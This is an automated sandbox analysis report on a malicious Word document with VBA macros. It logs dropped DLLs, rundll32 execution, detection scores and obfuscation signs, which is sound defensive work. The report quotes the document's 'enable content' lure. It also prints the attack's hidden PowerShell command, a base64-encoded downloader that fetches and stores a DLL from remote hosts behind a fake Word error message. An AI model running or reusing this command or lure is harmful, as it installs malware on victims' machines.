Source: Document image extraction number: 1 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll
Very long command line found
Source: unknown | Process created: Commandline size = 7856
Source: unknown | Process created: Commandline size = 7765
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 7765
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Ezfa\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFA34A30D7F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFA34A30D87
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFA34A30CD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFA34A30D30
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_1000D270
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10011EA7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10012750
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10012B5C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_1001237C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10012F7C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4D4F6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F450E1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F576E8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F59CD7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4ECCD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F5A0B0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F53A9F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F59A13
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F46212
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4241B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4CDF7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F42FF8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F543CB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4B5A9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F51D81
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F41577
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F54572
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F52766
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4DB62
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F44D3C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F55D25
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4A711
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F45B1F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F51AD1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F45EDF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F42CDA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4EEC4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F588C2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F532B2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F514BB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4AEA0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4A8AE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F59494
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F50E90
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F5A29B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F41673
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F56C51
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4CA31
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F52433
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F58225
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F41013
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4E800
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F49E02
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F50609
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F41BF7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F483F0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4C3FE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4AFF9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F445F9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F48FE5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F471EC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4F1ED
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4E1E9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4D7D7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F497DE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F57FCC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F521B0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4B7BC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F493AD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F515AF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F487AA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F44390
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4C19E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F50B86
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4BF80
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F46F7B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4196F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F5915E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4EB26
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F44B26
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4FD22
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F5410D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F43F0E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4F908
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F51108
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F46509
Source: v22Pc0qA.doc.doc | OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation | OLE, VBA macro: Module Dk5att0cu_9jsb, Function Document_open
Source: v22Pc0qA.doc.doc | OLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 1000B078 appears 46 times
Source: 00000004.00000002.689082292.00000271130C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000003.685190093.000002712B8A4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.700514213.000002712B630000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.698145971.0000027114D5D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.697286565.0000027114829000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.689101356.00000271130F0000.00000004.00000040.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.700460639.000002712B620000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: Chpieog.dll.4.dr | Static PE information: Section: .rsrc ZLIB complexity 0.999260733061
Source: classification engine | Classification label: mal100.troj.evad.winDOC@16/14@3/7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F590E0 CreateToolhelp32Snapshot,
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{6A94A75C-BF67-4F59-849A-17E54DA728FF} - OProcSessId.dat
Source: v22Pc0qA.doc.doc | OLE indicator, Word Document stream: true
Source: v22Pc0qA.doc.doc | OLE document summary: title field not present or empty
Source: v22Pc0qA.doc.doc | OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
Source: v22Pc0qA.doc.doc | Virustotal: Detection: 72%
Source: v22Pc0qA.doc.doc | Metadefender: Detection: 44%
Source: v22Pc0qA.doc.doc | ReversingLabs: Detection: 86%
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Window found: window name: SysTabControl32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp
Source: v22Pc0qA.doc.doc | Initial sample: OLE summary subject = extensible Automotive generate withdrawal Wooden Global architecture

                Data Obfuscation:

                Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                Source: v22Pc0qA.doc.docStream path 'Macros/VBA/Lxvinhyq0hu0i' : High number of GOTO operations
                Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Lxvinhyq0hu0i
                PowerShell case anomaly found
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                Suspicious powershell command line found
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                Source: Chpieog.dll.4.drStatic PE information: real checksum: 0x457fa should be: 0x416e4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A3493C push edx; retf
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A34B0B push eax; retf
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A33EFB push es; retf
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A342A3 push eax; retf
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000B0BD push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10007BCA push ecx; ret

                Persistence and Installation Behavior:

                Creates processes via WMI
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll
                Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Ezfa\bvb.lli

                Hooking and other Techniques for Hiding and Protection:

                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ezfa\bvb.lli:Zone.Identifier read attributes | delete
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
